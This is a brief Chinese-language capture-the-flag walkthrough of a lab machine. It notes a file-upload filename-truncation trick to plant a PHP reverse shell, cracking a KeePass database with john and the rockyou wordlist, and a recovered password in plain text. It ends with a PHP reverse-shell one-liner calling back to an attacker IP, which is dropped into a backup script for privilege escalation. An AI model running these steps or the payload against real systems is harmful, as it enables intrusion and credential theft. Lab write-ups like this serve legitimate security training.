上传文件的时候http://10.10.117.180/cloud/images/reversephp.php#.jpg(或者空格)都能截断

keepass2john dataset.kdbx > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
keepassxc dataset.kdbx

这个文件是opt目录下找到的

Cl0udP4ss40p4city#8700

然后就直接找到脚本文件backup.inc.php,没有修改权限,但是能直接rm,覆写一份就行

$sock=fsockopen("10.17.6.173",4444);exec("sh <&3 >&3 2>&3");